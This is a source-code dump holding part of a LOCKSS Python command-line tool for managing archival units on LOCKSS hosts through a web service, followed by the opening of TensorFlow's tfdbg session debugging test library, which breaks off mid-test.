list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation and/or
other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.'''
__version__ = '0.2.2'
import getpass
import itertools
from multiprocessing import Pool as ProcessPool
from multiprocessing.dummy import Pool as ThreadPool
from optparse import OptionGroup, OptionParser
import os.path
import sys
from threading import Lock, Thread
import ContentConfigurationServiceImplService_client
from wsutil import zsiauth
#
# Library
#
def add_au_by_id(host, auth, auid):
'''
Performs an addAuById operation (which adds a single AU on a single host, by
AUID), and returns a record with these fields:
- Id (string): the AUID
- IsSuccess (boolean): a success flag
- Message (string): an error message
- Name (string): the AU name
Parameters:
- host (string): a host:port pair
- auth (ZSI authentication object): an authentication object
- auid (string): an AUID
'''
req = ContentConfigurationServiceImplService_client.addAuById()
req.AuId = auid
return _ws_port(host, auth).addAuById(req).Return
def add_aus_by_id_list(host, auth, auids):
'''
Performs an addAusByIdList operation (which adds all given AUs on a single
host, by AUID), and returns a list of records with these fields:
- Id (string): the AUID
- IsSuccess (boolean): a success flag
- Message (string): an error message
- Name (string): the AU name
Parameters:
- host (string): a host:port pair
- auth (ZSI authentication object): an authentication object
- auids (list of strings): a list of AUIDs
'''
req = ContentConfigurationServiceImplService_client.addAusByIdList()
req.AuIds = auids
return _ws_port(host, auth).addAusByIdList(req).Return
def deactivate_au_by_id(host, auth, auid):
'''
Performs a deactivateAuById operation (which deactivates a single AU on a
single host, by AUID), and returns a record with these fields:
- Id (string): the AUID
- IsSuccess (boolean): a success flag
- Message (string): an error message
- Name (string): the AU name
Parameters:
- host (string): a host:port pair
- auth (ZSI authentication object): an authentication object
- auid (string): an AUID
'''
req = ContentConfigurationServiceImplService_client.deactivateAuById()
req.AuId = auid
return _ws_port(host, auth).deactivateAuById(req).Return
def deactivate_aus_by_id_list(host, auth, auids):
'''
Performs a deactivateAusByIdList operation (which deactivates all given AUs on
a single host, by AUID), and returns a list of records with these fields:
- Id (string): the AUID
- IsSuccess (boolean): a success flag
- Message (string): an error message
- Name (string): the AU name
Parameters:
- host (string): a host:port pair
- auth (ZSI authentication object): an authentication object
- auids (list of strings): a list of AUIDs
'''
req = ContentConfigurationServiceImplService_client.deactivateAusByIdList()
req.AuIds = auids
return _ws_port(host, auth).deactivateAusByIdList(req).Return
def delete_au_by_id(host, auth, auid):
'''
Performs a deleteAuById operation (which deletes a single AU on a single host,
by AUID), and returns a record with these fields:
- Id (string): the AUID
- IsSuccess (boolean): a success flag
- Message (string): an error message
- Name (string): the AU name
Parameters:
- host (string): a host:port pair
- auth (ZSI authentication object): an authentication object
- auid (string): an AUID
'''
req = ContentConfigurationServiceImplService_client.deleteAuById()
req.AuId = auid
return _ws_port(host, auth).deleteAuById(req).Return
def delete_aus_by_id_list(host, auth, auids):
'''
Performs a deleteAusByIdList operation (which deletes all given AUs on a
single host, by AUID), and returns a list of records with these fields:
- Id (string): the AUID
- IsSuccess (boolean): a success flag
- Message (string): an error message
- Name (string): the AU name
Parameters:
- host (string): a host:port pair
- auth (ZSI authentication object): an authentication object
- auids (list of strings): a list of AUIDs
'''
req = ContentConfigurationServiceImplService_client.deleteAusByIdList()
req.AuIds = auids
return _ws_port(host, auth).deleteAusByIdList(req).Return
def reactivate_au_by_id(host, auth, auid):
'''
Performs a reactivateAuById operation (which reactivates a single AU on a
single host, by AUID), and returns a record with these fields:
- Id (string): the AUID
- IsSuccess (boolean): a success flag
- Message (string): an error message
- Name (string): the AU name
Parameters:
- host (string): a host:port pair
- auth (ZSI authentication object): an authentication object
- auid (string): an AUID
'''
req = ContentConfigurationServiceImplService_client.reactivateAuById()
req.AuId = auid
return _ws_port(host, auth).reactivateAuById(req).Return
def reactivate_aus_by_id_list(host, auth, auids):
'''
Performs a reactivateAusByIdList operation (which reactivates all given AUs on
a single host, by AUID), and returns a list of records with these fields:
- Id (string): the AUID
- IsSuccess (boolean): a success flag
- Message (string): an error message
- Name (string): the AU name
Parameters:
- host (string): a host:port pair
- auth (ZSI authentication object): an authentication object
- auids (list of strings): a list of AUIDs
'''
req = ContentConfigurationServiceImplService_client.reactivateAusByIdList()
req.AuIds = auids
return _ws_port(host, auth).reactivateAusByIdList(req).Return
def _ws_port(host, auth, tracefile=None):
'''
Internal convenience method used to set up a Web Services Port.
Parameters:
- host (string): a host:port pair
- auth (ZSI authentication object): an authentication object
- tracefile (file object): an optional trace file (default None for no trace)
'''
url = 'http://%s/ws/ContentConfigurationService' % (host,)
locator = ContentConfigurationServiceImplService_client.ContentConfigurationServiceImplServiceLocator()
if tracefile is None: return locator.getContentConfigurationServiceImplPort(url=url, auth=auth)
else: return locator.getContentConfigurationServiceImplPort(url=url, auth=auth, tracefile=tracefile)
#
# Command line tool
#
__tutorial__ = '''\
INTRODUCTION
This tool can be used to add, delete, activate and deactivate AUs on one or more
LOCKSS hosts. Invoking the tool consists of four parts:
- Specify the target hosts. Each occurrence of --host=HOST adds the host:port
pair HOST to the list of target hosts, and each occurrence of --hosts=HFILE adds
the host:port pairs in the file HFILE to the list of target hosts. HFILE can
contain comments, which begin at the character '#' and extend to the end of the
line. At least one target host is required. You will be prompted for a username
and password unless you pass them via --username and --password.
- Specify the target AUIDs. Likewise, each occurrence of --auid=AUID adds the
given AUID to the list of target AUIDs, and each occurrence of --auids=AFILE
adds the AUIDs in the file AFILE to the list of target AUIDs. AFILE can also
contain comments. At least one target AUID is required.
- Specify the desired operation. This is done by using exactly one of --add-aus,
--delete-aus, --deactivate-aus or --reactivate-aus.
- Optionally specify output options (see below).
OUTPUT
This tool can produce two styles of output: text output with --text-output and
tabular output with --table-output. By default, --text-output is in effect,
unless --table-output is explicitly specified.
When --text-output is in effect, unsuccessful operations are output one per line
on the console, host by host. You can additionally specify --verbose, in which
case all successful operations are also displayed host by host. The --verbose
option is only valid if --text-output is in effect.
When --table-output is in effect, a tab-separated table of unsuccessful
operations is output to the console, one row per target AU with at least one
unsuccessful operation and one column per target host.
In either output mode, the order of AUs listed (for each host in text mode, for
the whole table in tabular mode) is dictated by --sort-by-auid (AUID) or
--sort-by-name (AU name). By default, --sort-by-name is in effect, unless
--sort-by-auid is explicitly specified. Likewise, the way AUs are displayed is
governed by --list-by-auid (show the AUID), --list-by-name (show the AU name),
or --list-by-both (show the name and the AUID separated by a tab). By default,
--list-by-both is in effect unless another option in this category is specified.
The listing by name is currently just a string comparison, not a clever library
sort like in the LOCKSS daemon.
EXAMPLES
$ scripts/ws/contentconfigurationservice --host=foo.university.edu:8081 --auid=aaaaa1 --add-aus
Adds the AUID aaaaa1 to foo.university.edu:8081. Produces text output (the
default) only if the operation does not succeed.
$ scripts/ws/contentconfigurationservice --hosts=mydaemons.hosts --auids=myfile.auids --add-aus
Adds the AUIDs contained in myfile.auids to all the hosts contained in
mydaemons.hosts. Produces text output (the default) only if some operations do
not succeed. AUs are sorted by AU name (the default) and displayed as a
name-AUID pair (the default).
$ scripts/ws/contentconfigurationservice --hosts=mydaemons.hosts --auids=myfile.auids --add-aus --verbose
Adds the AUIDs contained in myfile.auids to all the hosts contained in
mydaemons.hosts. Produces text output (the default), both of successful
operations and unsuccessful operations. AUs are sorted by AU name (the default)
and displayed as a name-AUID pair (the default).
$ scripts/ws/contentconfigurationservice --hosts=mydaemons.hosts --auids=myfile.auids --add-aus --list-by-name
Adds the AUIDs contained in myfile.auids to all the hosts contained in
mydaemons.hosts. Produces text output (the default) only if some operations do
not succeed. AUs are sorted by AU name (the default) and displayed by AU name.
$ scripts/ws/contentconfigurationservice --hosts=mydaemons.hosts --auids=myfile.auids --add-aus --sort-by-auid --list-by-auid
Adds the AUIDs contained in myfile.auids to all the hosts contained in
mydaemons.hosts. Produces text output (the default) only if some operations do
not succeed. AUs are sorted by AUID and displayed by AUID.
$ scripts/ws/contentconfigurationservice --hosts=mydaemons.hosts --auids=myfile.auids --add-aus --table-output
Adds the AUIDs contained in myfile.auids to all the hosts contained in
mydaemons.hosts. If any operation does not succeed, prints a table of
unsuccessful operations where each row is an AU and each column is a host. The
rows are sorted by AU name (the default) and displayed as a name-AUID pair (the
default).'''
class _ContentConfigurationServiceOptions(object):
'''An internal object to encapsulate options suitable for this tool.'''
@staticmethod
def make_parser():
'''Static method to make a command line parser suitable for this tool.'''
usage = '%prog {--host=HOST|--hosts=HFILE}... {--auid=AUID|--auids=AFILE}... {--add-aus|--deactivate-aus|--delete-aus|--reactivate-aus} [OPTIONS]'
parser = OptionParser(version=__version__, description=__doc__, usage=usage)
# Top-level options
parser.add_option('--copyright', action='store_true', help='display copyright and exit')
parser.add_option('--license', action='store_true', help='display software license and exit')
parser.add_option('--tutorial', action='store_true', help='display tutorial and exit')
# Hosts
group = OptionGroup(parser, 'Target hosts')
group.add_option('--host', action='append', default=list(), help='add host:port pair to list of target hosts')
group.add_option('--hosts', action='append', default=list(), metavar='HFILE', help='add host:port pairs in HFILE to list of target hosts')
group.add_option('--password', metavar='PASS', help='UI password (default: interactive prompt)')
group.add_option('--username', metavar='USER', help='UI username (default: interactive prompt)')
parser.add_option_group(group)
# AUIDs
group = OptionGroup(parser, 'Target AUIDs')
group.add_option('--auid', action='append', default=list(), help='add AUID to list of target AUIDs')
group.add_option('--auids', action='append', default=list(), metavar='AFILE', help='add AUIDs in AFILE to list of target AUIDs')
parser.add_option_group(group)
# Content configuration operations
group = OptionGroup(parser, 'Content configuration operations')
group.add_option('--add-aus', action='store_true', help='add target AUs to target hosts')
group.add_option('--deactivate-aus', action='store_true', help='deactivate target AUs on target hosts')
group.add_option('--delete-aus', action='store_true', help='delete target AUs from target hosts')
group.add_option('--reactivate-aus', action='store_true', help='reactivate target AUs on target hosts')
parser.add_option_group(group)
# Output options
group = OptionGroup(parser, 'Output options')
group.add_option('--list-by-auid', action='store_true', help='list output by AUID')
group.add_option('--list-by-both', action='store_true', help='list output by both AU name and AUID (default)')
group.add_option('--list-by-name', action='store_true', help='list output by AU name')
group.add_option('--sort-by-auid', action='store_true', help='sort output by AUID')
group.add_option('--sort-by-name', action='store_true', help='sort output by AU name (default)')
group.add_option('--table-output', action='store_true', help='produce tabular output')
group.add_option('--text-output', action='store_true', help='produce text output (default)')
group.add_option('--verbose', action='store_true', default=False, help='make --text-output verbose (default: %default)')
parser.add_option_group(group)
# Job pool
group = OptionGroup(parser, 'Job pool')
group.add_option('--pool-size', metavar='SIZE', type='int', default=0, help='size of the job pool, 0 for unlimited (default: %default)')
group.add_option('--process-pool', action='store_true', help='use a process pool')
group.add_option('--thread-pool', action='store_true', help='use a thread pool (default)')
parser.add_option_group(group)
# Other options
group = OptionGroup(parser, 'Other options')
group.add_option('--batch-size', metavar='SIZE', type='int', default=100, help='size of AUID batches (default: %default)')
parser.add_option_group(group)
return parser
def __init__(self, parser, opts, args):
'''
Constructor.
Parameters:
- parser (OptionParser instance): the option parser
- opts (Options instance): the Options instance returned by the parser
- args (list of strings): the remaining command line arguments returned by
the parser
'''
super(_ContentConfigurationServiceOptions, self).__init__()
self.errors = 0
# Special options
if opts.copyright: print __copyright__
if opts.license: print __license__
if opts.tutorial: print __tutorial__
if any([opts.copyright, opts.license, opts.tutorial]): sys.exit()
# General checks
if len(args) > 0:
parser.error('unexpected command line arguments: %s' % (' '.join(args),))
if len(filter(None, [opts.add_aus, opts.deactivate_aus, opts.delete_aus, opts.reactivate_aus])) != 1:
parser.error('exactly one of --add-aus, --deactivate-aus, --delete-aus, --reactivate-aus is required')
if len(filter(None, [opts.table_output, opts.text_output])) > 1:
parser.error('at most one of --table-output, --text-output can be specified')
# hosts
self.hosts = opts.host[:]
for f in opts.hosts: self.hosts.extend(_file_lines(f))
if len(self.hosts) == 0: parser.error('at least one target host is required')
# auids
self.auids = opts.auid[:]
for f in opts.auids: self.auids.extend(_file_lines(f))
if len(self.auids) == 0: parser.error('at least one target AUID is required')
# au_operation
if opts.add_aus: self.au_operation = add_aus_by_id_list
elif opts.deactivate_aus: self.au_operation = deactivate_aus_by_id_list
elif opts.delete_aus: self.au_operation = delete_aus_by_id_list
else: self.au_operation = reactivate_aus_by_id_list
# table_output/text_output/keysort/keydisplay/verbose
self.table_output = opts.table_output
self.text_output = not self.table_output
if opts.sort_by_auid: self.keysort = _sort_by_auid
else: self.keysort = _sort_by_name # default is --sort-by-name
if opts.list_by_auid: self.keydisplay = _list_by_auid
elif opts.list_by_name: self.keydisplay = _list_by_name
else: self.keydisplay = _list_by_both # default is --list-by-both
if self.text_output:
self.verbose = opts.verbose
elif opts.verbose:
parser.error('--verbose can only be specified with --text-output')
# pool_class/pool_size/batch_size
if opts.process_pool and opts.thread_pool:
parser.error('--process-pool and --thread-pool are mutually exclusive')
self.pool_class = ProcessPool if opts.process_pool else ThreadPool
self.pool_size = opts.pool_size or len(self.hosts)
self.batch_size = opts.batch_size
# auth
u = opts.username or getpass.getpass('UI username: ')
p = opts.password or getpass.getpass('UI password: ')
self.auth = zsiauth(u, p)
# This is to allow pickling, so the process pool works, but this isn't great
# Have the sort and list params be enums and have keysort and keydisplay be methods?
def _sort_by_name(t): return t
def _sort_by_auid(t): return (t[1], t[0])
def _list_by_auid(t): return (t[1],) if t else ['AUID']
def _list_by_name(t): return (t[0],) if t else ['AU name']
def _list_by_both(t): return t if t else ['AU name', 'AUID']
def _do_au_operation_job(options_host):
options, host = options_host
data = dict()
errors = 0
for i in xrange(0, len(options.auids), options.batch_size):
result = options.au_operation(host, options.auth, options.auids[i:i+options.batch_size])
for r in result:
if r.IsSuccess: msg = None
else:
msg = (r.Message or '').partition(':')[0]
errors = errors + 1
data[((r.Name, r.Id), (host,))] = msg
return (host, data, errors)
def _do_au_operation(options):
data = dict()
pool = options.pool_class(options.pool_size)
jobs = [(options, _host) for _host in options.hosts]
for host, result, errors in pool.imap_unordered(_do_au_operation_job, jobs):
data.update(result)
options.errors = options.errors + errors
if options.text_output:
for host in sorted(options.hosts):
hostresults = [(k[0], v) for k, v in data.iteritems() if k[1] == host]
if options.verbose:
successful = filter(lambda x: x[1] is None, hostresults)
if len(successful) > 0:
_output_record(options, ['Successful on %s:' % (host,)])
for x in sorted(successful, key=options.keysort):
_output_record(options, options.keydisplay(x[0]))
_output_record(options, [])
unsuccessful = filter(lambda x: x[1] is not None, hostresults)
if len(unsuccessful) > 0:
_output_record(options, ['Unsuccessful on %s:' % (host,)])
for x in sorted(unsuccessful, key=options.keysort):
_output_record(options, options.keydisplay(x[0]) + (x[1],))
_output_record(options, [])
else:
display = dict([((options.keydisplay(k[0]), k[1]), v) for k, v in data.iteritems()])
_output_table(options, display, options.keydisplay(None), [options.hosts])
# Last modified 2015-08-05
def _output_record(options, lst):
'''Internal method to display a single record.'''
print '\t'.join([str(x or '') for x in lst])
# Last modified 2016-05-16
def _output_table(options, data, rowheaders, lstcolkeys, rowsort=None):
'''Internal method to display tabular output. (Should be refactored.)'''
colkeys = [x for x in itertools.product(*lstcolkeys)]
for j in xrange(len(lstcolkeys)):
if j < len(lstcolkeys) - 1: rowpart = [''] * len(rowheaders)
else: rowpart = rowheaders
_output_record(options, rowpart + [x[j] for x in colkeys])
for rowkey in sorted(set([k[0] for k in data]), key=rowsort):
_output_record(options, list(rowkey) + [data.get((rowkey, colkey)) for colkey in colkeys])
# Last modified 2015-08-31
def _file_lines(fstr):
with open(os.path.expanduser(fstr)) as f: ret = filter(lambda y: len(y) > 0, [x.partition('#')[0].strip() for x in f])
if len(ret) == 0: sys.exit('Error: %s contains no meaningful lines' % (fstr,))
return ret
def _main():
'''Main method.'''
# Parse command line
parser = _ContentConfigurationServiceOptions.make_parser()
(opts, args) = parser.parse_args()
options = _ContentConfigurationServiceOptions(parser, opts, args)
# Dispatch
t = Thread(target=_do_au_operation, args=(options,))
t.daemon = True
t.start()
while True:
t.join(1.5)
if not t.is_alive(): break
# Errors
if options.errors > 0: sys.exit('%d %s; exiting' % (options.errors, 'error' if options.errors == 1 else 'errors'))
# Main entry point
if __name__ == '__main__': _main()
|
session_debug_testlib.py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for debugger functionalities in tf.Session."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import functools
import glob
import os
import shutil
import tempfile
import threading
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.core.util import event_pb2
from tensorflow.python.client import session
from tensorflow.python.debug.lib import debug_data
from tensorflow.python.debug.lib import debug_graphs
from tensorflow.python.debug.lib import debug_utils
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import parsing_ops
from tensorflow.python.ops import rnn
from tensorflow.python.ops import rnn_cell_impl
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
import tensorflow.python.ops.tensor_array_grad # pylint: disable=unused-import
from tensorflow.python.platform import googletest
from tensorflow.python.platform import test
from tensorflow.python.training import gradient_descent
def no_rewrite_session_config():
rewriter_config = rewriter_config_pb2.RewriterConfig(
disable_model_pruning=True,
arithmetic_optimization=rewriter_config_pb2.RewriterConfig.OFF,
dependency_optimization=rewriter_config_pb2.RewriterConfig.OFF)
graph_options = config_pb2.GraphOptions(rewrite_options=rewriter_config)
return config_pb2.ConfigProto(graph_options=graph_options)
class _RNNCellForTest(rnn_cell_impl.RNNCell):
"""RNN cell for testing."""
def __init__(self, input_output_size, state_size):
self._input_output_size = input_output_size
self._state_size = state_size
self._w = variables.Variable(1.0, dtype=dtypes.float32, name="w")
@property
def output_size(self):
return self._input_output_size
@property
def state_size(self):
return self._state_size
def __call__(self, input_, state, scope=None):
return (math_ops.multiply(self._w, input_), state)
class SessionDebugTestBase(test_util.TensorFlowTestCase):
"""Base class for unit tests of tfdbg running with tf.Session."""
@classmethod
def setUpClass(cls):
if test.is_gpu_available():
cls._expected_partition_graph_count = 2
cls._expected_num_devices = 2
gpu_name = test_util.gpu_device_name()
cls._main_device = "/job:localhost/replica:0/task:0" + gpu_name
else:
cls._expected_partition_graph_count = 1
cls._expected_num_devices = 1
cls._main_device = "/job:localhost/replica:0/task:0/device:CPU:0"
@classmethod
def tearDownClass(cls):
pass
def setUp(self):
self._dump_root = tempfile.mkdtemp()
def tearDown(self):
ops.reset_default_graph()
# Tear down temporary dump directory.
if os.path.isdir(self._dump_root):
shutil.rmtree(self._dump_root)
def _debug_urls(self, run_number=None):
raise NotImplementedError(
"_debug_urls() method is not implemented in the base test class.")
def _debug_dump_dir(self, run_number=None):
raise NotImplementedError(
"_debug_dump_dir() method is not implemented in the base test class.")
def _debug_run_and_get_dump(self,
sess,
fetches,
feed_dict=None,
debug_ops="DebugIdentity",
tolerate_debug_op_creation_failures=False,
global_step=-1,
validate=True,
expected_partition_graph_count=None):
"""Run fetches with debugging and obtain DebugDumpDir.
Args:
sess: the tf.Session to be used.
fetches: fetches of the Session.run().
feed_dict: feed dict for the Session.run().
debug_ops: name(s) of the debug ops to be used.
tolerate_debug_op_creation_failures: whether to tolerate debug op
creation failures.
global_step: Optional global step.
validate: whether to validate dumped tensors against graph.
expected_partition_graph_count: optional count of partition graphs to
assert on.
Returns:
1. Return values of the Session.run().
2. The DebugDumpDir object from the debugged run().
"""
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_utils.watch_graph(
run_options,
sess.graph,
debug_ops=debug_ops,
debug_urls=self._debug_urls(),
tolerate_debug_op_creation_failures=tolerate_debug_op_creation_failures,
global_step=global_step)
run_metadata = config_pb2.RunMetadata()
run_output = sess.run(fetches,
feed_dict=feed_dict,
options=run_options,
run_metadata=run_metadata)
if expected_partition_graph_count is not None:
self.assertEqual(expected_partition_graph_count,
len(run_metadata.partition_graphs))
return run_output, debug_data.DebugDumpDir(
self._dump_root, partition_graphs=run_metadata.partition_graphs,
validate=validate)
def _generate_dump_from_simple_addition_graph(self):
with session.Session(config=no_rewrite_session_config()) as sess:
u_init_val = np.array([[5.0, 3.0], [-1.0, 0.0]])
v_init_val = np.array([[2.0], [-1.0]])
# Use node names with overlapping namespace (i.e., parent directory) to
# test concurrent, non-racing directory creation.
u_name = "u"
v_name = "v"
w_name = "w"
u_init = constant_op.constant(u_init_val, shape=[2, 2])
u = variables.Variable(u_init, name=u_name)
v_init = constant_op.constant(v_init_val, shape=[2, 1])
v = variables.Variable(v_init, name=v_name)
w = math_ops.matmul(u, v, name=w_name)
u.initializer.run()
v.initializer.run()
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_urls = "file://%s" % self._dump_root
# Add debug tensor watch for u.
debug_utils.add_debug_tensor_watch(
run_options, "%s/read" % u_name, 0, debug_urls=debug_urls)
# Add debug tensor watch for v.
debug_utils.add_debug_tensor_watch(
run_options, "%s/read" % v_name, 0, debug_urls=debug_urls)
run_metadata = config_pb2.RunMetadata()
# Invoke Session.run().
sess.run(w, options=run_options, run_metadata=run_metadata)
self.assertEqual(self._expected_partition_graph_count,
len(run_metadata.partition_graphs))
dump = debug_data.DebugDumpDir(
self._dump_root, partition_graphs=run_metadata.partition_graphs)
simple_add_results = collections.namedtuple("SimpleAddResults", [
"u_init_val", "v_init_val", "u", "v", "w", "u_name", "v_name", "w_name",
"dump"
])
return simple_add_results(u_init_val, v_init_val, u, v, w, u_name, v_name,
w_name, dump)
def testCopyNodesHaveCorrectDebugOpsAndURLsAttributeValues(self):
with session.Session() as sess:
u = variables.Variable(2.1, name="u")
v = variables.Variable(20.0, name="v")
w = math_ops.multiply(u, v, name="w")
sess.run(variables.global_variables_initializer())
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_urls = self._debug_urls()
debug_utils.add_debug_tensor_watch(
run_options,
"u",
0, ["DebugNumericSummary(gated_grpc=True)", "DebugIdentity"],
debug_urls=debug_urls)
debug_utils.add_debug_tensor_watch(
run_options, "v", 0, ["DebugNumericSummary"], debug_urls=debug_urls)
run_metadata = config_pb2.RunMetadata()
r = sess.run(w, options=run_options, run_metadata=run_metadata)
self.assertAllClose(42.0, r)
u_copy_node_def = None
v_copy_node_def = None
for partition_graph in run_metadata.partition_graphs:
for node_def in partition_graph.node:
if debug_graphs.is_copy_node(node_def.name):
if node_def.name == "__copy_u_0":
u_copy_node_def = node_def
elif node_def.name == "__copy_v_0":
v_copy_node_def = node_def
self.assertIsNotNone(u_copy_node_def)
debug_ops_spec = u_copy_node_def.attr["debug_ops_spec"].list.s
self.assertEqual(2, len(debug_ops_spec))
self.assertEqual("DebugNumericSummary;%s;1" % debug_urls[0],
debug_ops_spec[0].decode("utf-8"))
self.assertEqual("DebugIdentity;%s;0" % debug_urls[0],
debug_ops_spec[1].decode("utf-8"))
self.assertIsNotNone(v_copy_node_def)
debug_ops_spec = v_copy_node_def.attr["debug_ops_spec"].list.s
self.assertEqual(1, len(debug_ops_spec))
self.assertEqual("DebugNumericSummary;%s;0" % debug_urls[0],
debug_ops_spec[0].decode("utf-8"))
def testConcurrentDumpingToPathsWithOverlappingParentDirsWorks(self):
results = self._generate_dump_from_simple_addition_graph()
self.assertTrue(results.dump.loaded_partition_graphs())
# Since global_step is not explicitly specified, it should take its default
# value: -1.
self.assertEqual(-1, results.dump.core_metadata.global_step)
self.assertGreaterEqual(results.dump.core_metadata.session_run_index, 0)
self.assertGreaterEqual(results.dump.core_metadata.executor_step_index, 0)
self.assertEqual([], results.dump.core_metadata.input_names)
self.assertEqual([results.w.name], results.dump.core_metadata.output_names)
self.assertEqual([], results.dump.core_metadata.target_nodes)
# Verify the dumped tensor values for u and v.
self.assertEqual(2, results.dump.size)
self.assertAllClose([results.u_init_val],
results.dump.get_tensors("%s/read" % results.u_name, 0,
"DebugIdentity"))
self.assertAllClose([results.v_init_val],
results.dump.get_tensors("%s/read" % results.v_name, 0,
"DebugIdentity"))
self.assertGreaterEqual(
results.dump.get_rel_timestamps("%s/read" % results.u_name, 0,
"DebugIdentity")[0], 0)
self.assertGreaterEqual(
results.dump.get_rel_timestamps("%s/read" % results.v_name, 0,
"DebugIdentity")[0], 0)
self.assertGreater(
results.dump.get_dump_sizes_bytes("%s/read" % results.u_name, 0,
"DebugIdentity")[0], 0)
self.assertGreater(
results.dump.get_dump_sizes_bytes("%s/read" % results.v_name, 0,
"DebugIdentity")[0], 0)
def testGetOpTypeWorks(self):
results = self._generate_dump_from_simple_addition_graph()
self.assertEqual(results.u.op.type,
results.dump.node_op_type(results.u_name))
self.assertIn(results.v.op.type, results.dump.node_op_type(results.v_name))
self.assertIn(results.w.op.type, results.dump.node_op_type(results.w_name))
with self.assertRaisesRegexp(
ValueError, r"None of the .* device\(s\) has a node named "):
results.dump.node_op_type("foo_bar")
def testDumpStringTensorsWorks(self):
with session.Session(config=no_rewrite_session_config()) as sess:
str1_init_val = np.array(b"abc")
str2_init_val = np.array(b"def")
str1_init = constant_op.constant(str1_init_val)
str2_init = constant_op.constant(str2_init_val)
str1_name = "str1"
str2_name = "str2"
str1 = variables.Variable(str1_init, name=str1_name)
str2 = variables.Variable(str2_init, name=str2_name)
# Concatenate str1 and str2
str_concat = math_ops.add(str1, str2, name="str_concat")
str1.initializer.run()
str2.initializer.run()
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_urls = self._debug_urls()
# Add debug tensor watch for u.
debug_utils.add_debug_tensor_watch(
run_options, "%s/read" % str1_name, 0, debug_urls=debug_urls)
# Add debug tensor watch for v.
debug_utils.add_debug_tensor_watch(
run_options, "%s/read" % str2_name, 0, debug_urls=debug_urls)
run_metadata = config_pb2.RunMetadata()
sess.run(str_concat, options=run_options, run_metadata=run_metadata)
# String ops are located on CPU.
self.assertEqual(1, len(run_metadata.partition_graphs))
dump = debug_data.DebugDumpDir(
self._dump_root, partition_graphs=run_metadata.partition_graphs)
self.assertIn(str1_name, dump.nodes())
self.assertIn(str2_name, dump.nodes())
self.assertEqual(2, dump.size)
self.assertEqual([str1_init_val],
dump.get_tensors("%s/read" % str1_name, 0,
"DebugIdentity"))
self.assertEqual([str2_init_val],
dump.get_tensors("%s/read" % str2_name, 0,
"DebugIdentity"))
self.assertGreaterEqual(
dump.get_rel_timestamps("%s/read" % str1_name, 0, "DebugIdentity")[0],
0)
self.assertGreaterEqual(
dump.get_rel_timestamps("%s/read" % str2_name, 0, "DebugIdentity")[0],
0)
self.assertGreater(
dump.get_dump_sizes_bytes("%s/read" % str1_name, 0,
"DebugIdentity")[0], 0)
self.assertGreater(
dump.get_dump_sizes_bytes("%s/read" % str2_name, 0,
"DebugIdentity")[0], 0)
def testDumpUninitializedVariable(self):
op_namespace = "testDumpUninitializedVariable"
with session.Session() as sess:
u_init_val = np.array([[5.0, 3.0], [-1.0, 0.0]])
s_init_val = b"str1"
u_name = "%s/u" % op_namespace
s_name = "%s/s" % op_namespace
u_init = constant_op.constant(u_init_val, shape=[2, 2])
u = variables.Variable(u_init, name=u_name)
s_init = constant_op.constant(s_init_val)
s = variables.Variable(s_init, name=s_name)
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_urls = self._debug_urls()
# Add debug tensor watch for u.
debug_utils.add_debug_tensor_watch(
run_options, u_name, 0, debug_urls=debug_urls)
debug_utils.add_debug_tensor_watch(
run_options, s_name, 0, debug_urls=debug_urls)
run_metadata = config_pb2.RunMetadata()
# Initialize u and s.
sess.run(variables.global_variables_initializer(),
options=run_options,
run_metadata=run_metadata)
# Verify the dump file for the uninitialized value of u.
dump = debug_data.DebugDumpDir(
self._dump_root, partition_graphs=run_metadata.partition_graphs)
self.assertEqual(2, dump.size)
self.assertEqual(self._expected_partition_graph_count,
len(run_metadata.partition_graphs))
# Verify that the variable is properly initialized by the run() call.
u_vals = dump.get_tensors(u_name, 0, "DebugIdentity")
s_vals = dump.get_tensors(s_name, 0, "DebugIdentity")
self.assertEqual(1, len(u_vals))
self.assertIsInstance(u_vals[0], debug_data.InconvertibleTensorProto)
self.assertFalse(u_vals[0].initialized)
self.assertEqual(1, len(s_vals))
self.assertIsInstance(s_vals[0], debug_data.InconvertibleTensorProto)
